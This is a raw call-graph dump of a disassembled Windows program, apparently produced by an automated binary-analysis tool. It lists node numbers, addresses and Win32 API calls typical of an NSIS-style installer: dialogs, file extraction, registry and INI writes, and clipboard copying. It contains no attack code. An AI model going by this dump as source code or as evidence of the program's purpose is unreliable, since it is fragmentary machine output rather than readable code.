404916 4597->4600 4598 40498c CallWindowProcW 4598->4600 4611 40487a SendMessageW 4599->4611 4602->4598 4616 406035 lstrcpynW 4602->4616 4604 404971 4617 405f7d wsprintfW 4604->4617 4606 404978 4607 40141d 80 API calls 4606->4607 4608 40497f 4607->4608 4618 406035 lstrcpynW 4608->4618 4610->4598 4612 4048d7 SendMessageW 4611->4612 4613 40489d GetMessagePos ScreenToClient SendMessageW 4611->4613 4615 4048cf 4612->4615 4614 4048d4 4613->4614 4613->4615 4614->4612 4615->4602 4616->4604 4617->4606 4618->4610 3733 4050f9 3734 4052c1 3733->3734 3735 40511a GetDlgItem GetDlgItem GetDlgItem 3733->3735 3736 4052f2 3734->3736 3737 4052ca GetDlgItem CreateThread CloseHandle 3734->3737 3782 403dc4 SendMessageW 3735->3782 3739 405320 3736->3739 3741 405342 3736->3741 3742 40530c ShowWindow ShowWindow 3736->3742 3737->3736 3785 405073 OleInitialize 3737->3785 3743 40537e 3739->3743 3745 405331 3739->3745 3746 405357 ShowWindow 3739->3746 3740 40518e 3752 406831 18 API calls 3740->3752 3747 403df6 8 API calls 3741->3747 3784 403dc4 SendMessageW 3742->3784 3743->3741 3748 405389 SendMessageW 3743->3748 3749 403d44 SendMessageW 3745->3749 3750 405377 3746->3750 3751 405369 3746->3751 3757 4052ba 3747->3757 3756 4053a2 CreatePopupMenu 3748->3756 3748->3757 3749->3741 3755 403d44 SendMessageW 3750->3755 3753 404f9e 25 API calls 3751->3753 3754 4051ad 3752->3754 3753->3750 3758 4062cf 11 API calls 3754->3758 3755->3743 3759 406831 18 API calls 3756->3759 3760 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3758->3760 3761 4053b2 AppendMenuW 3759->3761 3762 405203 SendMessageW SendMessageW 3760->3762 3763 40521f 3760->3763 3764 4053c5 GetWindowRect 3761->3764 3765 4053d8 3761->3765 3762->3763 3766 405232 3763->3766 3767 405224 SendMessageW 3763->3767 3768 4053df TrackPopupMenu 3764->3768 3765->3768 3769 403d6b 19 API calls 3766->3769 3767->3766 3768->3757 3770 4053fd 3768->3770 3771 405242 3769->3771 3772 405419 SendMessageW 3770->3772 3773 40524b ShowWindow 3771->3773 3774 40527f GetDlgItem SendMessageW 3771->3774 3772->3772 3775 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3772->3775 3776 405261 ShowWindow 3773->3776 3777 40526e 3773->3777 3774->3757 3778 4052a2 SendMessageW SendMessageW 3774->3778 3779 40545b SendMessageW 3775->3779 3776->3777 3783 403dc4 SendMessageW 3777->3783 3778->3757 3779->3779 3780 405486 GlobalUnlock SetClipboardData CloseClipboard 3779->3780 3780->3757 3782->3740 3783->3774 3784->3739 3786 403ddb SendMessageW 3785->3786 3790 405096 3786->3790 3787 403ddb SendMessageW 3788 4050d1 OleUninitialize 3787->3788 3789 4062cf 11 API calls 3789->3790 3790->3789 3791 40139d 80 API calls 3790->3791 3792 4050c1 3790->3792 3791->3790 3792->3787 4619 4020f9 GetDC GetDeviceCaps 4620 401446 18 API calls 4619->4620 4621 402116 MulDiv 4620->4621 4622 401446 18 API calls 4621->4622 4623 40212c 4622->4623 4624 406831 18 API calls 4623->4624 4625 402165 CreateFontIndirectW 4624->4625 4626 4030dc 4625->4626 4627 4030e3 4626->4627 4629 405f7d wsprintfW 4626->4629 4629->4627 4630 4024fb 4631 40145c 18 API calls 4630->4631 4632 402502 4631->4632 4633 40145c 18 API calls 4632->4633 4634 40250c 4633->4634 4635 40145c 18 API calls 4634->4635 4636 402515 4635->4636 4637 40145c 18 API calls 4636->4637 4638 40251f 4637->4638 4639 40145c 18 API calls 4638->4639 4640 402529 4639->4640 4641 40253d 4640->4641 4642 40145c 18 API calls 4640->4642 4643 4062cf 11 API calls 4641->4643 4642->4641 4644 40256a CoCreateInstance 4643->4644 4645 40258c 4644->4645 4646 4026fc 4648 402708 4646->4648 4649 401ee4 4646->4649 4647 406831 18 API calls 4647->4649 4649->4646 4649->4647 3793 4019fd 3794 40145c 18 API calls 3793->3794 3795 401a04 3794->3795 3798 405eab 3795->3798 3799 405eb8 GetTickCount GetTempFileNameW 3798->3799 3800 401a0b 3799->3800 3801 405eee 3799->3801 3801->3799 3801->3800 4650 4022fd 4651 40145c 18 API calls 4650->4651 4652 402304 GetFileVersionInfoSizeW 4651->4652 4653 4030e3 4652->4653 4654 40232b GlobalAlloc 4652->4654 4654->4653 4655 40233f GetFileVersionInfoW 4654->4655 4656 402350 VerQueryValueW 4655->4656 4657 402381 GlobalFree 4655->4657 4656->4657 4658 402369 4656->4658 4657->4653 4663 405f7d wsprintfW 4658->4663 4661 402375 4664 405f7d wsprintfW 4661->4664 4663->4661 4664->4657 4665 402afd 4666 40145c 18 API calls 4665->4666 4667 402b04 4666->4667 4672 405e7c GetFileAttributesW CreateFileW 4667->4672 4669 402b10 4670 4030e3 4669->4670 4673 405f7d wsprintfW 4669->4673 4672->4669 4673->4670 4674 4029ff 4675 401553 19 API calls 4674->4675 4676 402a09 4675->4676 4677 40145c 18 API calls 4676->4677 4678 402a12 4677->4678 4679 402a1f RegQueryValueExW 4678->4679 4683 401a13 4678->4683 4680 402a45 4679->4680 4681 402a3f 4679->4681 4682 4029e4 RegCloseKey 4680->4682 4680->4683 4681->4680 4685 405f7d wsprintfW 4681->4685 4682->4683 4685->4680 4686 401000 4687 401037 BeginPaint GetClientRect 4686->4687 4688 40100c DefWindowProcW 4686->4688 4690 4010fc 4687->4690 4691 401182 4688->4691 4692 401073 CreateBrushIndirect FillRect DeleteObject 4690->4692 4693 401105 4690->4693 4692->4690 4694 401170 EndPaint 4693->4694 4695 40110b CreateFontIndirectW 4693->4695 4694->4691 4695->4694 4696 40111b 6 API calls 4695->4696 4696->4694 4697 401f80 4698 401446 18 API calls 4697->4698 4699 401f88 4698->4699 4700 401446 18 API calls 4699->4700 4701 401f93 4700->4701 4702 401fa3 4701->4702 4703 40145c 18 API calls 4701->4703 4704 401fb3 4702->4704 4705 40145c 18 API calls 4702->4705 4703->4702 4706 402006 4704->4706 4707 401fbc 4704->4707 4705->4704 4708 40145c 18 API calls 4706->4708 4709 401446 18 API calls 4707->4709 4710 40200d 4708->4710 4711 401fc4 4709->4711 4713 40145c 18 API calls 4710->4713 4712 401446 18 API calls 4711->4712 4714 401fce 4712->4714 4715 402016 FindWindowExW 4713->4715 4716 401ff6 SendMessageW 4714->4716 4717 401fd8 SendMessageTimeoutW 4714->4717 4719 402036 4715->4719 4716->4719 4717->4719 4718 4030e3 4719->4718 4721 405f7d wsprintfW 4719->4721 4721->4718 4722 402880 4723 402884 4722->4723 4724 40145c 18 API calls 4723->4724 4725 4028a7 4724->4725 4726 40145c 18 API calls 4725->4726 4727 4028b1 4726->4727 4728 4028ba RegCreateKeyExW 4727->4728 4729 4028e8 4728->4729 4734 4029ef 4728->4734 4730 402934 4729->4730 4732 40145c 18 API calls 4729->4732 4731 402963 4730->4731 4733 401446 18 API calls 4730->4733 4735 4029ae RegSetValueExW 4731->4735 4738 40337f 33 API calls 4731->4738 4736 4028fc lstrlenW 4732->4736 4737 402947 4733->4737 4741 4029c6 RegCloseKey 4735->4741 4742 4029cb 4735->4742 4739 402918 4736->4739 4740 40292a 4736->4740 4744 4062cf 11 API calls 4737->4744 4745 40297b 4738->4745 4746 4062cf 11 API calls 4739->4746 4747 4062cf 11 API calls 4740->4747 4741->4734 4743 4062cf 11 API calls 4742->4743 4743->4741 4744->4731 4753 406250 4745->4753 4750 402922 4746->4750 4747->4730 4750->4735 4752 4062cf 11 API calls 4752->4750 4754 406273 4753->4754 4755 4062b6 4754->4755 4756 406288 wsprintfW 4754->4756 4757 402991 4755->4757 4758 4062bf lstrcatW 4755->4758 4756->4755 4756->4756 4757->4752 4758->4757 4759 403d02 4760 403d0d 4759->4760 4761 403d11 4760->4761 4762 403d14 GlobalAlloc 4760->4762 4762->4761 4763 402082 4764 401446 18 API calls 4763->4764 4765 402093 SetWindowLongW 4764->4765 4766 4030e3 4765->4766 4767 402a84 4768 401553 19 API calls 4767->4768 4769 402a8e 4768->4769 4770 401446 18 API calls 4769->4770 4771 402a98 4770->4771 4772 401a13 4771->4772 4773 402ab2 RegEnumKeyW 4771->4773 4774 402abe RegEnumValueW 4771->4774 4775 402a7e 4773->4775 4774->4772 4774->4775 4775->4772 4776 4029e4 RegCloseKey 4775->4776 4776->4772 4777 402c8a 4778 402ca2 4777->4778 4779 402c8f 4777->4779 4781 40145c 18 API calls 4778->4781 4780 401446 18 API calls 4779->4780 4783 402c97 4780->4783 4782 402ca9 lstrlenW 4781->4782 4782->4783 4784 401a13 4783->4784 4785 402ccb WriteFile 4783->4785 4785->4784 4786 401d8e 4787 40145c 18 API calls 4786->4787 4788 401d95 ExpandEnvironmentStringsW 4787->4788 4789 401da8 4788->4789 4790 401db9 4788->4790 4789->4790 4791 401dad lstrcmpW 4789->4791 4791->4790 4792 401e0f 4793 401446 18 API calls 4792->4793 4794 401e17 4793->4794 4795 401446 18 API calls 4794->4795 4796 401e21 4795->4796 4797 4030e3 4796->4797 4799 405f7d wsprintfW 4796->4799 4799->4797 4800 40438f 4801 4043c8 4800->4801 4802 40439f 4800->4802 4803 403df6 8 API calls 4801->4803 4804 403d6b 19 API calls 4802->4804 4806 4043d4 4803->4806 4805 4043ac SetDlgItemTextW 4804->4805 4805->4801 4807 403f90 4808 403fa0 4807->4808 4809 403fbc 4807->4809 4818 405cb0 GetDlgItemTextW 4808->4818 4811 403fc2 SHGetPathFromIDListW 4809->4811 4812 403fef 4809->4812 4814 403fd2 4811->4814 4817 403fd9 SendMessageW 4811->4817 4813 403fad SendMessageW 4813->4809 4815 40141d 80 API calls 4814->4815 4815->4817 4817->4812 4818->4813 4819 402392 4820 40145c 18 API calls 4819->4820 4821 402399 4820->4821 4824 407224 4821->4824 4825 406efe 25 API calls 4824->4825 4826 407244 4825->4826 4827 4023a7 4826->4827 4828 40724e lstrcpynW lstrcmpW 4826->4828 4829 407280 4828->4829 4830 407286 lstrcpynW 4828->4830 4829->4830 4830->4827 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4831 402797 4832 40145c 18 API calls 4831->4832 4833 4027ae 4832->4833 4834 40145c 18 API calls 4833->4834 4835 4027b7 4834->4835 4836 40145c 18 API calls 4835->4836 4837 4027c0 GetPrivateProfileStringW lstrcmpW 4836->4837 4838 401e9a 4839 40145c 18 API calls 4838->4839 4840 401ea1 4839->4840 4841 401446 18 API calls 4840->4841 4842 401eab wsprintfW 4841->4842 3802 401a1f 3803 40145c 18 API calls 3802->3803 3804 401a26 3803->3804 3805 4062cf 11 API calls 3804->3805 3806 401a49 3805->3806 3807 401a64 3806->3807 3808 401a5c 3806->3808 3877 406035 lstrcpynW 3807->3877 3876 406035 lstrcpynW 3808->3876 3811 401a6f 3878 40674e lstrlenW CharPrevW 3811->3878 3812 401a62 3815 406064 5 API calls 3812->3815 3846 401a81 3815->3846 3816 406301 2 API calls 3816->3846 3819 401a98 CompareFileTime 3819->3846 3820 401ba9 3821 404f9e 25 API calls 3820->3821 3823 401bb3 3821->3823 3822 401b5d 3824 404f9e 25 API calls 3822->3824 3855 40337f 3823->3855 3826 401b70 3824->3826 3830 4062cf 11 API calls 3826->3830 3828 406035 lstrcpynW 3828->3846 3829 4062cf 11 API calls 3831 401bda 3829->3831 3835 401b8b 3830->3835 3832 401be9 SetFileTime 3831->3832 3833 401bf8 CloseHandle 3831->3833 3832->3833 3833->3835 3836 401c09 3833->3836 3834 406831 18 API calls 3834->3846 3837 401c21 3836->3837 3838 401c0e 3836->3838 3839 406831 18 API calls 3837->3839 3840 406831 18 API calls 3838->3840 3841 401c29 3839->3841 3843 401c16 lstrcatW 3840->3843 3844 4062cf 11 API calls 3841->3844 3843->3841 3847 401c34 3844->3847 3845 401b50 3849 401b93 3845->3849 3850 401b53 3845->3850 3846->3816 3846->3819 3846->3820 3846->3822 3846->3828 3846->3834 3846->3845 3848 4062cf 11 API calls 3846->3848 3854 405e7c GetFileAttributesW CreateFileW 3846->3854 3881 405e5c GetFileAttributesW 3846->3881 3884 405ccc 3846->3884 3851 405ccc MessageBoxIndirectW 3847->3851 3848->3846 3852 4062cf 11 API calls 3849->3852 3853 4062cf 11 API calls 3850->3853 3851->3835 3852->3835 3853->3822 3854->3846 3856 40339a 3855->3856 3857 4033c7 3856->3857 3890 403368 SetFilePointer 3856->3890 3888 403336 ReadFile 3857->3888 3861 401bc6 3861->3829 3862 403546 3864 40354a 3862->3864 3865 40356e 3862->3865 3863 4033eb GetTickCount 3863->3861 3868 403438 3863->3868 3866 403336 ReadFile 3864->3866 3865->3861 3869 403336 ReadFile 3865->3869 3870 40358d WriteFile 3865->3870 3866->3861 3867 403336 ReadFile 3867->3868 3868->3861 3868->3867 3872 40348a GetTickCount 3868->3872 3873 4034af MulDiv wsprintfW 3868->3873 3875 4034f3 WriteFile 3868->3875 3869->3865 3870->3861 3871 4035a1 3870->3871 3871->3861 3871->3865 3872->3868 3874 404f9e 25 API calls 3873->3874 3874->3868 3875->3861 3875->3868 3876->3812 3877->3811 3879 401a75 lstrcatW 3878->3879 3880 40676b lstrcatW 3878->3880 3879->3812 3880->3879 3882 405e79 3881->3882 3883 405e6b SetFileAttributesW 3881->3883 3882->3846 3883->3882 3885 405ce1 3884->3885 3886 405d2f 3885->3886 3887 405cf7 MessageBoxIndirectW 3885->3887 3886->3846 3887->3886 3889 403357 3888->3889 3889->3861 3889->3862 3889->3863 3890->3857 4843 40209f GetDlgItem GetClientRect 4844 40145c 18 API calls 4843->4844 4845 4020cf LoadImageW SendMessageW 4844->4845 4846 4030e3 4845->4846 4847 4020ed DeleteObject 4845->4847 4847->4846 4848 402b9f 4849 401446 18 API calls 4848->4849 4853 402ba7 4849->4853 4850 402c4a 4851 402bdf ReadFile 4851->4853 4860 402c3d 4851->4860 4852 401446 18 API calls 4852->4860 4853->4850 4853->4851 4854 402c06 MultiByteToWideChar 4853->4854 4855 402c3f 4853->4855 4856 402c4f 4853->4856 4853->4860 4854->4853 4854->4856 4861 405f7d wsprintfW 4855->4861 4858 402c6b SetFilePointer 4856->4858 4856->4860 4858->4860 4859 402d17 ReadFile 4859->4860 4860->4850 4860->4852 4860->4859 4861->4850 3417 402b23 GlobalAlloc 3418 402b39 3417->3418 3419 402b4b 3417->3419 3428 401446 3418->3428 3421 40145c 18 API calls 3419->3421 3422 402b52 WideCharToMultiByte lstrlenA 3421->3422 3423 402b41 3422->3423 3424 402b84 WriteFile 3423->3424 3425 402b93 3423->3425 3424->3425 3426 402384 GlobalFree 3424->3426 3426->3425 3429 406831 18 API calls 3428->3429 3430 401455 3429->3430 3430->3423 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3441 4054a5 3442 4055f9 3441->3442 3443 4054bd 3441->3443 3445 40564a 3442->3445 3446 40560a GetDlgItem GetDlgItem 3442->3446 3443->3442 3444 4054c9 3443->3444 3448 4054d4 SetWindowPos 3444->3448 3449 4054e7 3444->3449 3447 4056a4 3445->3447 3455 40139d 80 API calls 3445->3455 3450 403d6b 19 API calls 3446->3450 3456 4055f4 3447->3456 3511 403ddb 3447->3511 3448->3449 3452 405504 3449->3452 3453 4054ec ShowWindow 3449->3453 3454 405634 SetClassLongW 3450->3454 3457 405526 3452->3457 3458 40550c DestroyWindow 3452->3458 3453->3452 3459 40141d 80 API calls 3454->3459 3462 40567c 3455->3462 3460 40552b SetWindowLongW 3457->3460 3461 40553c 3457->3461 3463 405908 3458->3463 3459->3445 3460->3456 3464 4055e5 3461->3464 3465 405548 GetDlgItem 3461->3465 3462->3447 3466 405680 SendMessageW 3462->3466 3463->3456 3472 405939 ShowWindow 3463->3472 3531 403df6 3464->3531 3469 405578 3465->3469 3470 40555b SendMessageW IsWindowEnabled 3465->3470 3466->3456 3467 40141d 80 API calls 3480 4056b6 3467->3480 3468 40590a DestroyWindow KiUserCallbackDispatcher 3468->3463 3474 405585 3469->3474 3477 4055cc SendMessageW 3469->3477 3478 405598 3469->3478 3486 40557d 3469->3486 3470->3456 3470->3469 3472->3456 3473 406831 18 API calls 3473->3480 3474->3477 3474->3486 3476 403d6b 19 API calls 3476->3480 3477->3464 3481 4055a0 3478->3481 3482 4055b5 3478->3482 3479 4055b3 3479->3464 3480->3456 3480->3467 3480->3468 3480->3473 3480->3476 3502 40584a DestroyWindow 3480->3502 3514 403d6b 3480->3514 3525 40141d 3481->3525 3483 40141d 80 API calls 3482->3483 3485 4055bc 3483->3485 3485->3464 3485->3486 3528 403d44 3486->3528 3488 405731 GetDlgItem 3489 405746 3488->3489 3490 40574f ShowWindow KiUserCallbackDispatcher 3488->3490 3489->3490 3517 403db1 KiUserCallbackDispatcher 3490->3517 3492 405779 EnableWindow 3495 40578d 3492->3495 3493 405792 GetSystemMenu EnableMenuItem SendMessageW 3494 4057c2 SendMessageW 3493->3494 3493->3495 3494->3495 3495->3493 3518 403dc4 SendMessageW 3495->3518 3519 406035 lstrcpynW 3495->3519 3498 4057f0 lstrlenW 3499 406831 18 API calls 3498->3499 3500 405806 SetWindowTextW 3499->3500 3520 40139d 3500->3520 3502->3463 3503 405864 CreateDialogParamW 3502->3503 3503->3463 3504 405897 3503->3504 3505 403d6b 19 API calls 3504->3505 3506 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3505->3506 3507 40139d 80 API calls 3506->3507 3508 4058e8 3507->3508 3508->3456 3509 4058f0 ShowWindow 3508->3509 3510 403ddb SendMessageW 3509->3510 3510->3463 3512 403df3 3511->3512 3513 403de4 SendMessageW 3511->3513 3512->3480 3513->3512 3515 406831 18 API calls 3514->3515 3516 403d76 SetDlgItemTextW 3515->3516 3516->3488 3517->3492 3518->3495 3519->3498 3523 4013a4 3520->3523 3521 401410 3521->3480 3523->3521 3524 4013dd MulDiv SendMessageW 3523->3524 3545 4015a0 3523->3545 3524->3523 3526 40139d 80 API calls 3525->3526 3527 401432 3526->3527 3527->3486 3529 403d51 SendMessageW 3528->3529 3530 403d4b 3528->3530 3529->3479 3530->3529 3532 403e0b GetWindowLongW 3531->3532 3542 403e94 3531->3542 3533 403e1c 3532->3533 3532->3542 3534 403e2b GetSysColor 3533->3534 3535 403e2e 3533->3535 3534->3535 3536 403e34 SetTextColor 3535->3536 3537 403e3e SetBkMode 3535->3537 3536->3537 3538 403e56 GetSysColor 3537->3538 3539 403e5c 3537->3539 3538->3539 3540 403e63 SetBkColor 3539->3540 3541 403e6d 3539->3541 3540->3541 3541->3542 3543 403e80 DeleteObject 3541->3543 3544 403e87 CreateBrushIndirect 3541->3544 3542->3456 3543->3544 3544->3542 3546 4015fa 3545->3546 3625 40160c 3545->3625 3547 401601 3546->3547 3548 401742 3546->3548 3549 401962 3546->3549 3550 4019ca 3546->3550 3551 40176e 3546->3551 3552 401650 3546->3552 3553 4017b1 3546->3553 3554 401672 3546->3554 3555 401693 3546->3555 3556 401616 3546->3556 3557 4016d6 3546->3557 3558 401736 3546->3558 3559 401897 3546->3559 3560 4018db 3546->3560 3561 40163c 3546->3561 3562 4016bd 3546->3562 3546->3625 3571 4062cf 11 API calls 3547->3571 3563 401751 ShowWindow 3548->3563 3564 401758 3548->3564 3568 40145c 18 API calls 3549->3568 3575 40145c 18 API calls 3550->3575 3565 40145c 18 API calls 3551->3565 3589 4062cf 11 API calls 3552->3589 3569 40145c 18 API calls 3553->3569 3566 40145c 18 API calls 3554->3566 3570 401446 18 API calls 3555->3570 3574 40145c 18 API calls 3556->3574 3588 401446 18 API calls 3557->3588 3557->3625 3558->3625 3679 405f7d wsprintfW 3558->3679 3567 40145c 18 API calls 3559->3567 3572 40145c 18 API calls 3560->3572 3576 401647 PostQuitMessage 3561->3576 3561->3625 3573 4062cf 11 API calls 3562->3573 3563->3564 3577 401765 ShowWindow 3564->3577 3564->3625 3578 401775 3565->3578 3579 401678 3566->3579 3580 40189d 3567->3580 3581 401968 GetFullPathNameW 3568->3581 3582 4017b8 3569->3582 3583 40169a 3570->3583 3571->3625 3584 4018e2 3572->3584 3585 4016c7 SetForegroundWindow 3573->3585 3586 40161c 3574->3586 3587 4019d1 SearchPathW 3575->3587 3576->3625 3577->3625 3591 4062cf 11 API calls 3578->3591 3592 4062cf 11 API calls 3579->3592 3670 406301 FindFirstFileW 3580->3670 3594 4019a1 3581->3594 3595 40197f 3581->3595 3596 4062cf 11 API calls 3582->3596 3597 4062cf 11 API calls 3583->3597 3598 40145c 18 API calls 3584->3598 3585->3625 3599 4062cf 11 API calls 3586->3599 3587->3558 3587->3625 3588->3625 3600 401664 3589->3600 3601 401785 SetFileAttributesW 3591->3601 3602 401683 3592->3602 3614 4019b8 GetShortPathNameW 3594->3614 3594->3625 3595->3594 3620 406301 2 API calls 3595->3620 3604 4017c9 3596->3604 3605 4016a7 Sleep 3597->3605 3606 4018eb 3598->3606 3607 401627 3599->3607 3608 40139d 65 API calls 3600->3608 3609 40179a 3601->3609 3601->3625 3618 404f9e 25 API calls 3602->3618 3652 405d85 CharNextW CharNextW 3604->3652 3605->3625 3615 40145c 18 API calls 3606->3615 3616 404f9e 25 API calls 3607->3616 3608->3625 3617 4062cf 11 API calls 3609->3617 3610 4018c2 3621 4062cf 11 API calls 3610->3621 3611 4018a9 3619 4062cf 11 API calls 3611->3619 3614->3625 3623 4018f5 3615->3623 3616->3625 3617->3625 3618->3625 3619->3625 3624 401991 3620->3624 3621->3625 3622 4017d4 3626 401864 3622->3626 3629 405d32 CharNextW 3622->3629 3647 4062cf 11 API calls 3622->3647 3627 4062cf 11 API calls 3623->3627 3624->3594 3678 406035 lstrcpynW 3624->3678 3625->3523 3626->3602 3628 40186e 3626->3628 3630 401902 MoveFileW 3627->3630 3658 404f9e 3628->3658 3633 4017e6 CreateDirectoryW 3629->3633 3634 401912 3630->3634 3635 40191e 3630->3635 3633->3622 3637 4017fe GetLastError 3633->3637 3634->3602 3641 406301 2 API calls 3635->3641 3651 401942 3635->3651 3639 401827 GetFileAttributesW 3637->3639 3640 40180b GetLastError 3637->3640 3639->3622 3644 4062cf 11 API calls 3640->3644 3645 401929 3641->3645 3642 401882 SetCurrentDirectoryW 3642->3625 3643 4062cf 11 API calls 3646 40195c 3643->3646 3644->3622 3645->3651 3673 406c94 3645->3673 3646->3625 3647->3622 3650 404f9e 25 API calls 3650->3651 3651->3643 3653 405da2 3652->3653 3656 405db4 3652->3656 3655 405daf CharNextW 3653->3655 3653->3656 3654 405dd8 3654->3622 3655->3654 3656->3654 3657 405d32 CharNextW 3656->3657 3657->3656 3659 404fb7 3658->3659 3660 401875 3658->3660 3661 404fd5 lstrlenW 3659->3661 3662 406831 18 API calls 3659->3662 3669 406035 lstrcpynW 3660->3669 3663 404fe3 lstrlenW 3661->3663 3664 404ffe 3661->3664 3662->3661 3663->3660 3665 404ff5 lstrcatW 3663->3665 3666 405011 3664->3666 3667 405004 SetWindowTextW 3664->3667 3665->3664 3666->3660 3668 405017 SendMessageW SendMessageW SendMessageW 3666->3668 3667->3666 3668->3660 3669->3642 3671 4018a5 3670->3671 3672 406317 FindClose 3670->3672 3671->3610 3671->3611 3672->3671 3680 406328 GetModuleHandleA 3673->3680 3677 401936 3677->3650 3678->3594 3679->3625 3681 406340 LoadLibraryA 3680->3681 3682 40634b GetProcAddress 3680->3682 3681->3682 3683 406359 3681->3683 3682->3683 3683->3677 3684 406ac5 lstrcpyW 3683->3684 3685 406b13 GetShortPathNameW 3684->3685 3686 406aea 3684->3686 3687 406b2c 3685->3687 3688 406c8e 3685->3688 3710 405e7c GetFileAttributesW CreateFileW 3686->3710 3687->3688 3691 406b34 WideCharToMultiByte 3687->3691 3688->3677 3690 406af3 CloseHandle GetShortPathNameW 3690->3688 3692 406b0b 3690->3692 3691->3688 3693 406b51 WideCharToMultiByte 3691->3693 3692->3685 3692->3688 3693->3688 3694 406b69 wsprintfA 3693->3694 3695 406831 18 API calls 3694->3695 3696 406b95 3695->3696 3711 405e7c GetFileAttributesW CreateFileW 3696->3711 3698 406ba2 3698->3688 3699 406baf GetFileSize GlobalAlloc 3698->3699 3700 406bd0 ReadFile 3699->3700 3701 406c84 CloseHandle 3699->3701 3700->3701 3702 406bea 3700->3702 3701->3688 3702->3701 3712 405de2 lstrlenA 3702->3712 3705 406c03 lstrcpyA 3708 406c25 3705->3708 3706 406c17 3707 405de2 4 API calls 3706->3707 3707->3708 3709 406c5c SetFilePointer WriteFile GlobalFree 3708->3709 3709->3701 3710->3690 3711->3698 3713 405e23 lstrlenA 3712->3713 3714 405e2b 3713->3714 3715 405dfc lstrcmpiA 3713->3715 3714->3705 3714->3706 3715->3714 3716 405e1a CharNextA 3715->3716 3716->3713 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3891 4038af #17 SetErrorMode 